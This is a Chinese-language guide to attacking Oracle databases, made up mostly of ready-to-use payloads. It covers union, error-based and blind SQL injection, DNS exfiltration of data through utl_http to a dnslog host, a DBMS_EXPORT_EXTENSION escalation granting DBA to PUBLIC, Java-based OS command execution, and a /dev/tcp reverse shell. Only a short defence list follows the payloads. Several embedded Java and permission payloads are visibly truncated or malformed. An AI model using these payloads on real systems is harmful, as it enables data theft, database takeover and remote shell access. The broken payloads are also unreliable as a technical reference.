Oracle数据库注入与提权全面指南

1. Oracle权限体系

1.1 权限分类

Oracle权限分为两大类：

• 系统权限：用户对数据库系统的操作权限
• 实体权限：用户对具体模式实体(schema)的操作权限

1.2 系统权限等级

1. DBA：最高权限，可创建数据库结构
2. RESOURCE：可创建实体，不能创建数据库结构
3. CONNECT：仅可登录Oracle，不能创建实体或数据库结构

1.3 权限管理命令

-- 授权命令(仅DBA用户可执行)
GRANT connect, resource, dba TO username1, username2...;

-- 回收权限
REVOKE connect, resource, dba FROM system;

-- 权限传递选项
GRANT connect, resource TO user50 WITH ADMIN OPTION;

-- 查询权限
SELECT * FROM dba_role_privs;
SELECT * FROM dba_sys_privs;
SELECT * FROM role_sys_privs;
SELECT * FROM session_privs;

-- 删除用户
DROP USER [username] CASCADE;

2. Oracle注入技术

2.1 联合查询注入

基本步骤

1. 判断列数：

?id=1 ORDER BY 3 --+

2. 确定回显点：

?id=-1 UNION SELECT null,null,null FROM dual --+
?id=-1 UNION SELECT 1,'2','3' FROM dual --+

3. 获取数据库信息：

-- 版本信息
?id=-1 UNION SELECT 1,(SELECT banner FROM sys.v_$version WHERE rownum=1),'3' FROM dual --+

-- 实例名
?id=-1 UNION SELECT 1,(SELECT instance_name FROM v_$instance),'3' FROM dual --+

4. 获取用户名(数据库名)：

-- 第一个用户名
?id=-1 UNION SELECT 1,(SELECT username FROM all_users WHERE rownum=1),'3' FROM dual --+

-- 排除已获取用户名的查询
?id=-1 UNION SELECT 1,(SELECT username FROM all_users WHERE rownum=1 AND username NOT IN ('SYS')),'3' FROM dual --+

-- 当前用户
?id=-1 UNION SELECT 1,(SELECT user FROM dual),'3' FROM dual --+

5. 获取表名：

-- 指定用户的第一个表
?id=-1 UNION SELECT 1,(SELECT table_name FROM all_tables WHERE rownum=1 AND owner='TEST'),'3' FROM dual --+

-- 指定用户的第二个表
?id=-1 UNION SELECT 1,(SELECT table_name FROM all_tables WHERE rownum=1 AND owner='TEST' AND table_name<>'NEWS'),'3' FROM dual --+

6. 获取字段名：

?id=-1 UNION SELECT 1,(SELECT column_name FROM all_tab_columns WHERE owner='TEST' AND table_name='USERS' AND rownum=1),'3' FROM dual --+
?id=-1 UNION SELECT 1,(SELECT column_name FROM all_tab_columns WHERE owner='TEST' AND table_name='USERS' AND rownum=1 AND column_name<>'ID'),'3' FROM dual --+

7. 获取数据：

?id=-1 UNION SELECT 1,(SELECT concat(concat(username,'~~'),password) FROM users WHERE rownum=1),null FROM dual --+

2.2 报错注入技术

常用报错函数

1. utl_inaddr.get_host_name()：

-- 获取用户名
?id=1 AND 1=utl_inaddr.get_host_name('~'||(SELECT user FROM dual)||'')

2. ctxsys.drithsx.sn()：

-- 获取表名
?id=1 AND 1=ctxsys.drithsx.sn(1,'~'||(SELECT table_name FROM all_tables WHERE rownum=1 AND owner='TEST')||'')

3. dbms_xdb_version.checkin()：

-- 获取字段名
?id=1 AND (SELECT dbms_xdb_version.checkin('~'||(SELECT column_name FROM all_tab_columns WHERE owner='TEST' AND table_name='USERS' AND rownum=1)||'~') FROM dual) IS NOT NULL --+

4. XMLType()：

-- 获取数据
?id=1 AND (SELECT upper(XMLType(chr(60)||chr(58)||(SELECT username FROM test.users WHERE rownum=1)||chr(62))) FROM dual) IS NOT NULL --+

2.3 布尔型盲注

使用函数

1. decode()函数：

-- 判断用户
?id=1 AND 1=(SELECT decode(user,'TEST',1,0) FROM dual) --+

-- 逐字符猜解
?id=1 AND 1=(SELECT decode(substr((SELECT user FROM dual),1,1),'a',1,0) FROM dual) --+

2. instr()函数：

?id=1 AND (instr((SELECT user FROM dual),'S'))=1 --+

3. substr()函数：

-- 猜解长度
?id=1 AND (SELECT length(user) FROM dual)=3 --+

-- ASCII爆破
?id=1 AND (SELECT ascii(substr(user,1,1))FROM dual)=65 --+

2.4 时间盲注

使用函数

1. dbms_pipe.receive_message()：

-- 基础延时测试
?id=1 AND 1=(dbms_pipe.receive_message('RDS',5)) --+

-- 结合条件判断
?id=1 AND 7238=(CASE WHEN (ascii(substrc((SELECT nvl(cast(user AS varchar(4000)),chr(32)) FROM dual),1,1)) > 65) THEN dbms_pipe.receive_message(chr(32)||chr(106)||chr(72)||chr(73),5) ELSE 7238 END) --+

2. decode()与延时结合：

?id=1 AND 1=(SELECT decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS', 5),0) FROM dual) --+

2.5 DNS外带注入

-- 检测UTL_HTTP支持
?id=1 AND exists (SELECT count(*) FROM all_objects WHERE object_name='UTL_HTTP') --+

-- 获取用户名
?id=1 AND utl_http.request('http://'||(SELECT user FROM dual)||'.z9mt3s.dnslog.cn/oracle')=1--+

-- 获取表名
?id=1 AND utl_http.request('http://'||(SELECT table_name FROM all_tables WHERE rownum=1 AND owner='TEST')||'.z9mt3s.dnslog.cn/oracle')=1--+

3. 提权技术

3.1 dbms_export_extension()漏洞

影响版本：Oracle 8.1.7.4, 9.2.0.1-9.2.0.7, 10.1.0.2-10.1.0.4, 10.2.0.1-10.2.0.2, XE

-- 提升权限到DBA
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0) FROM dual

3.2 Java命令执行

创建Java库执行命令

-- 创建Java库
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args){try{BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"";myReader.close();return str;} catch (Exception e){return e.toString(END;'';END;--','SYS',0,'1',0) FROM dual

-- 赋予Java权限
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(PUBLIC'SYS:java.io.FilePermission'execute'end;'''';END;'';END;--','SYS',0,'1',0) FROM dual

-- 创建函数
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name''''''''LinxUtil.runCMD(java.lang.String) return String'END;'';END;--','SYS',0,'1',0) FROM dual

-- 执行命令
SELECT sys.LinxRunCMD('/bin/bash -c /usr/bin/whoami') FROM dual

Java反弹Shell

import java.io.*;
import java.net.*;

public class shellRev {
    public static void main(String[] args) {
        System.out.println(1);
        try{run();} catch(Exception e){}
    }
    public static void run() throws Exception {
        String[] aaa={"/bin/bash","-c","exec 9<> /dev/tcp/192.168.1.50/8080;exec 0<&9;exec 1>&9 2>&1;/bin/sh"};
        Process p=Runtime.getRuntime().exec(aaa);
    }
}

SQL注入实现：

-- 创建Java库
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "shell" as import java.io.*;import java.net.*;public class shell {public static void run() throws Exception{String[] aaa={"/bin/bash","-c","exec 9<> /dev/tcp/127.0.0.1/8080;exec 0<&9;exec 1>&9 2>&1;/bin/sh"};Process p=Runtime.getRuntime().exec(aaa)END;'';END;--','SYS',0,'1',0) FROM dual

-- 赋予Java权限
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(PUBLIC'SYS:java.net.SocketPermission'end;'''';END;'';END;--','SYS',0,'1',0) FROM dual

-- 创建函数
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function reversetcp RETURN VARCHAR2 as language java name ''''''''shell.run() return String'END;'';END;--','SYS',0,'1',0) FROM dual

-- 反弹shell
SELECT sys.reversetcp FROM dual

4. 防御建议

1. 最小权限原则：仅授予用户必要的最小权限
2. 及时安装补丁：修复已知的Oracle漏洞
3. 禁用危险函数：如UTL_HTTP、DBMS_EXPORT_EXTENSION等
4. 输入验证：对所有用户输入进行严格过滤
5. 使用参数化查询：避免SQL拼接
6. 监控异常行为：检测可疑的数据库操作

通过以上全面的Oracle注入与提权技术分析，安全研究人员可以更好地理解Oracle数据库的安全机制和潜在风险，从而采取有效措施保护数据库安全。